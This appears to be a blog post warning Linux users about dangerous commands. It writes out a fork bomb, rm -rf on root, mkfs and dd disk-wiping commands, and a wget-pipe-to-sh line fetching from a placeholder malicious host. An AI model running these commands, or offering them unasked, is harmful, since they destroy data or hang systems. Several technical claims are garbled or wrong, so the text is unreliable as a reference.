There are many linux commands which are used to perform different tasks.There are some commands from which you need to be aware.if not executed properly can be dangerous:
1. Linux Fork Bomb Command
:(){ :|: & };: also known as Fork Bomb is a denial-of-service attack against a Linux System. :(){ :|: & };: is a bash function. Once executed, it repeats itself until the system hangs.The only way to get rid of it is by restarting your system.
2. Mv Folder/Dev/Null Command
mv folder/dev/null is another highly risky command. Dev/null or null device is a device file that removes all the data written on it but it reports that the writing operation is performed successfully. It widely known as bit bucked or black hole.
3. Rm -Rf Command
rm -rf command is a fast way to delete a folder and its content in the Linux operating system.The most common combinations and options used with rm-rf command are listed below:
- rm command is used to delete the files in Linux system.
- rm -f command removes read-only files in folder without prompting.
- rm -r command deletes the content of a folder recursively.
- rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
- rm -rf/ command is used for forced deletion (it deletes it even if it’s write protected) of all the content in root directory and sub folders.
- rm -rf* command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders.
- rm -rf. command is used for forced deletion of all the content in the current folder and sub folders. The rm -r.[^.]* command can also be used.
- rm -i command is used for removal of files and folders but a prompt will appear before removal.
4. Mkfs Command
mkfs can be a seriously dangerous command for your Linux based system.Anything written after the mkfs will be formatted and replaced by a blank file system.
All the commands below will format the hard drive and it requires administrator permission:
- mkfs
- mkfs.ext3
- mkfs.bfs
- mkfs.ext2
- mkfs.minix
- mkfs.msdos
- mkfs.reiserfs
- mkfs.vfat
The command mkfs.cramfs will format the hard drive and it does not requires administrator's permission.
5. Tar Bomb
The tar command is used for combining multiple files into a single file (archived file) in .tar format. A Tape Archive (Tar) bomb can be created with this command.It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.
You can avoid this attack by regularly creating a new protective directory whenever you receive a tar file and then moving the received tar file into this directory before untarring.If the tar file is a tar bomb then you can simply remove the newly created directory to get rid of it. Another way to avoid the explosion of a tar bomb is through the -t option to list all of the content of a tar file .So user can know what he had stored within the tar file.
6. Dd Command
The dd command is used to copy & convert hard disk partitions.Any one of the following can be used to perform this action:
- dd if=/dev/hda of=/dev/hdb
- dd if=/dev/hda of=/dev/sdb
- dd if=something of=/dev/hda
- dd if=something of=/dev/sda
The following command will zero out the whole primary hard drive: dd if=/dev/zero of=/dev/had
7. Shell Script Code
Someone may attack you by giving you the link to a shell script and convincing you to download and execute it. The script may contain some malicious or harmful code inside. The format of command may look like this: wget http://some_malicious_source -O- | sh. The wget will download the script while the sh downloads the script execution.
8. Malicious Source Code
Someone gives you the source code and asks you to compile it. The code may appear to be a normal code but in fact some malicious or harmful code is disguised in the large source code and it may cause damage to your system. To avoid being victimized by this kind of attack, only accept and compile your source code from trustworthy sources.
9. Decompression Bomb
You have received a compressed file and you are asked to extract this file which appears to be very small in size but may be a few KB. In fact, this small sized compressed file contains very highly compressed data.
Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system. To avoid this situation, always remember to accept data from trustworthy sources.
Note : An important thing to note is that some of these commands are only dangerous if they are prefixed with sudo on Ubuntu. While on other distributions of Linux, most of these given commands will be dangerous to execute as root.
No comments:
Post a Comment